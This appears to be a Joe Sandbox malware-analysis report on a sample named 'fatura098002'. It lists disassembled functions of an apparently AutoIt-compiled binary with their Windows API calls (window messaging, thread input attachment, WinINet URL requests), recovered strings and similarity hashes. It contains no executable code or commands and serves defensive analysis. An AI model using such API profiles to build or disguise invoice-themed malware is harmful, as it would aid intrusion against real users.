SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00793A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00793AA0
GetWindowLongW.USER32(?,000000F0), ref: 00793AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00793AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00793B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00793BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00793BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00793BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00793BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00793C13

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 5404072f43717cf41971c928a4bd15b5d475b498ec9f465e401936bbad1ed2a9
Instruction ID: 91c06b7cbcb218dbfac336c2110ec729cd2bfb0a0c16ef55cdce3c44152e9bfa
Opcode Fuzzy Hash: 5404072f43717cf41971c928a4bd15b5d475b498ec9f465e401936bbad1ed2a9
Instruction Fuzzy Hash: 33618D75900248AFDF10DFA8DC81EEE77F8EB09700F10419AFA15A7292C778AE41DB60

Function 0076B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0076B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B165
GetWindowThreadProcessId.USER32(00000000), ref: 0076B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0076B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B21D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 371782bd641f54103b84ba9e6acc29c49b564ad6edcc7e8ee583bdee30cdffb7
Instruction ID: 0662687e7550a396188cc2f0d647ab8ca77797f13559ba8da457446941a4c448
Opcode Fuzzy Hash: 371782bd641f54103b84ba9e6acc29c49b564ad6edcc7e8ee583bdee30cdffb7
Instruction Fuzzy Hash: 4F319171500204BFDF129F64DC59B6E7BBABB52311F10C016FE02EA290D7BC9A818F69

Function 00732C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00732C94

Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0

_free.LIBCMT ref: 00732CA0
_free.LIBCMT ref: 00732CAB
_free.LIBCMT ref: 00732CB6
_free.LIBCMT ref: 00732CC1
_free.LIBCMT ref: 00732CCC
_free.LIBCMT ref: 00732CD7
_free.LIBCMT ref: 00732CE2
_free.LIBCMT ref: 00732CED
_free.LIBCMT ref: 00732CFB

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b9040cbd97578d59a99ac14f30609361fca46113580b29f45fc5f6077a414f31
Instruction ID: 9a37e9b23c3debd017c13d47da197dcb7c683ce73eb933043494eb1eb32587ed
Opcode Fuzzy Hash: b9040cbd97578d59a99ac14f30609361fca46113580b29f45fc5f6077a414f31
Instruction Fuzzy Hash: 0811B276100118EFEB02EF54E886DDD3BA5BF05350F9144A0FA88AB233DA35FA519F90

Function 00705BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00705C7A

Part of subcall function 00705D0A: GetClientRect.USER32(?,?), ref: 00705D30
Part of subcall function 00705D0A: GetWindowRect.USER32(?,?), ref: 00705D71
Part of subcall function 00705D0A: ScreenToClient.USER32(?,?), ref: 00705D99

GetDC.USER32 ref: 007446F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00744708
SelectObject.GDI32(00000000,00000000), ref: 00744716
SelectObject.GDI32(00000000,00000000), ref: 0074472B
ReleaseDC.USER32(?,00000000), ref: 00744733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007447C4

Strings

U, xrefs: 00744693

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: b906d76487869b3be99d733ec4ce7ec13c5169437c1de9c338285c763a96c872
Instruction ID: 1a3a3360f3b5458a92acf78aa15df67251ca1925075cea4115a6e8ffc0e90ff2
Opcode Fuzzy Hash: b906d76487869b3be99d733ec4ce7ec13c5169437c1de9c338285c763a96c872
Instruction Fuzzy Hash: DD710331500205EFDF22CF64C984BBA7BB5FF4A360F14426AED555A1A6C7399C42EF60

Function 0073AF88 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?), ref: 0073AFAB

Strings

acos, xrefs: 0073B123
log10, xrefs: 0073AFF5, 0073B045
asin, xrefs: 0073B117
exp, xrefs: 0073B070, 0073B0D2
log, xrefs: 0073B051, 0073B05D
sqrt, xrefs: 0073B12F
pow, xrefs: 0073B08F, 0073B13B, 0073B14E

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 4dcf7ea1ef702077492f4dfb05ac3164c0f35fe6b1a1cbfa9f1b848ab65bc496
Instruction ID: 91687afd7b42f06f68188c94af0b2cc8bb1fd97eab6406f2786be904d578480e
Opcode Fuzzy Hash: 4dcf7ea1ef702077492f4dfb05ac3164c0f35fe6b1a1cbfa9f1b848ab65bc496
Instruction Fuzzy Hash: 0751B0B190050EDBEF14DFA8E94C1ADBBB0FF49300F204295E591A7266CB3D8D258B69

Function 0077359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007735E4

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

LoadStringW.USER32(007D2390,?,00000FFF,?), ref: 0077360A

Strings

^ ERROR, xrefs: 007736C9
Line %d (File "%s"):, xrefs: 0077366B
"%s" (%d) : ==> %s:, xrefs: 00773742
Error: , xrefs: 007736EF
"%s" (%d) : ==> %s:%s%s, xrefs: 00773724

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 64ff895d8a6f1e2ecac16ad370852290671803f8f65d6c844eb6d11706964854
Instruction ID: fb9cee9bd097e718651a352fa0db8eea7f07ed09ca152bf12c02ff13458ae9c8
Opcode Fuzzy Hash: 64ff895d8a6f1e2ecac16ad370852290671803f8f65d6c844eb6d11706964854
Instruction Fuzzy Hash: 66516471900209FBDF15EBA0DC86EEEBB78AF04340F548225F60572192DB395B99DFA0

Function 0077C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0077C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0077C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0077C2CA
GetLastError.KERNEL32 ref: 0077C322
SetEvent.KERNEL32(?), ref: 0077C336
InternetCloseHandle.WININET(00000000), ref: 0077C341

Strings

, xrefs: 0077C2BB

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: aea63bd4bee8bd737e90b68408c9089bf6596a50cde1fa72cb8dc72b3345f708
Instruction ID: 86e84460bb798a8c5b84877324a6fad6dddbb079dd7092f0450bfb450244f267
Opcode Fuzzy Hash: aea63bd4bee8bd737e90b68408c9089bf6596a50cde1fa72cb8dc72b3345f708
Instruction Fuzzy Hash: 50317FB1500604AFDF229FA48C88AAB7BFCFB49784F14C51EF44AD2201DB38DD059B65

Function 0076989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00743AAF,?,?,Bad directive syntax error,0079CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 007698BC
LoadStringW.USER32(00000000,?,00743AAF,?), ref: 007698C3

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00769987

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 007698F1
Line %d:, xrefs: 00769912
., xrefs: 0076996D
Error: , xrefs: 00769955
Line %d (File "%s"):, xrefs: 0076992D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: ee0554930cfb68a0fd10bdda76c3527f4510473373e13c2a8bb4faafd59bdff4
Instruction ID: a6706b96b3e10546827e5a147f60ec1f150f605ad921ed31f0ef8f01900f682b
Opcode Fuzzy Hash: ee0554930cfb68a0fd10bdda76c3527f4510473373e13c2a8bb4faafd59bdff4
Instruction Fuzzy Hash: B4218071C0025AEBDF15EF90CC4AEEE7779BF18300F04445AF619620E2EB39A658DB20

Function 0076209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 007620AB
GetClassNameW.USER32(00000000,?,00000100), ref: 007620C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0076214D

Strings

list, xrefs: 0076212F
details, xrefs: 007620FB
SHELLDLL_DefView, xrefs: 007620CC
smallicons, xrefs: 00762115
largeicons, xrefs: 007620E1

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 40a4c77f65397e3a523e6081014e9edf8ad98e47e121d069eef11e9127521523
Instruction ID: 8c7bab936c5e04ae6ab28f019023c00c0d0482e5019e22da7c1779127b7729e0
Opcode Fuzzy Hash: 40a4c77f65397e3a523e6081014e9edf8ad98e47e121d069eef11e9127521523
Instruction Fuzzy Hash: 7D113DF628CB0AF6FA056624EC0ADA6379CCB05314B20401AFF05B40D2FE6D6C435514

Function 0073CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0073CEB7
_free.LIBCMT ref: 0073CF22
_free.LIBCMT ref: 0073CF48
_free.LIBCMT ref: 0073CF71
_free.LIBCMT ref: 0073CFA9
_free.LIBCMT ref: 0073CFDA
_free.LIBCMT ref: 0073D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0073D09C
_free.LIBCMT ref: 0073D0B5

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: b56b68f12af3488b6978f8f2db66ac3f0956a0ff528f25caa4f1b41ee8c7667b
Instruction ID: 1b83e8fd75c208b727fe098ea767d470715c80e15d9b8c2f163682fc37e65928
Opcode Fuzzy Hash: b56b68f12af3488b6978f8f2db66ac3f0956a0ff528f25caa4f1b41ee8c7667b
Instruction Fuzzy Hash: 37612772A05316AFFB26AFB4A889B697BA5EF05310F14416EF940B7243D73E9D01C790

Function 00718BCD Relevance: 13.7, APIs: 9, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00718F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00718BE8,?,00000000,?,?,?,?,00718BBA,00000000,?), ref: 00718FC5

DestroyWindow.USER32(?), ref: 00718C81
KillTimer.USER32(00000000,?,?,?,?,00718BBA,00000000,?), ref: 00718D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00756973
DeleteObject.GDI32(00000000), ref: 007569E6

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 2402799130-0
Opcode ID: fa1c54e7f7c7c4b438f07043b6adebd4f5a2d5bb6cab5ee3239166efe93bf043
Instruction ID: 926795d4334a65c4c65f857a64f03dc7c57b55b70759ba9c91666d7b05c07324
Opcode Fuzzy Hash: fa1c54e7f7c7c4b438f07043b6adebd4f5a2d5bb6cab5ee3239166efe93bf043
Instruction Fuzzy Hash: F661AC30502600EFCB629F18D958BA577F2FB40312F94855EE4429B5A0CB7DB9C5CFAA

Function 007950D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00795186
ShowWindow.USER32(?,00000000), ref: 007951C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 007951CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 007951D1

Part of subcall function 00796FBA: DeleteObject.GDI32(00000000), ref: 00796FE6

GetWindowLongW.USER32(?,000000F0), ref: 0079520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0079521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0079524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00795287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00795296

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 5ac2116631cf3faca1af78fd9fa83dc01877ec93a93a4ad489727ba4844e71c7
Instruction ID: c509e34332ffb2fa457772367390a39dfc840b31f3b83d90c447fc29a141227e
Opcode Fuzzy Hash: 5ac2116631cf3faca1af78fd9fa83dc01877ec93a93a4ad489727ba4844e71c7
Instruction Fuzzy Hash: BC51B270A80A2CFFEF269F28EC49BD83B65FB05321F148112F615962E0C37DA981DB41

Function 00718B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00756890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007568A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007568B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 007568D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007568F2
DestroyCursor.USER32(00000000), ref: 00756901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0075691E
DestroyCursor.USER32(00000000), ref: 0075692D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend
String ID:
API String ID: 3992029641-0
Opcode ID: b0323ed22748e5a3ed477028e6b873e5b7cfca3f5644639d4352d8c7a2da4d98
Instruction ID: bd9dbc32156defdf02772f9f28c06e4ba1bdd16fd50348c75a14a9c8ab4e3ff5
Opcode Fuzzy Hash: b0323ed22748e5a3ed477028e6b873e5b7cfca3f5644639d4352d8c7a2da4d98
Instruction Fuzzy Hash: 37518BB0600209EFDB20CF28CC55BAA7BB5FF54751F144519F906972E0DBB8E991DB50

Function 0077C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0077C182
GetLastError.KERNEL32 ref: 0077C195
SetEvent.KERNEL32(?), ref: 0077C1A9

Part of subcall function 0077C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0077C272
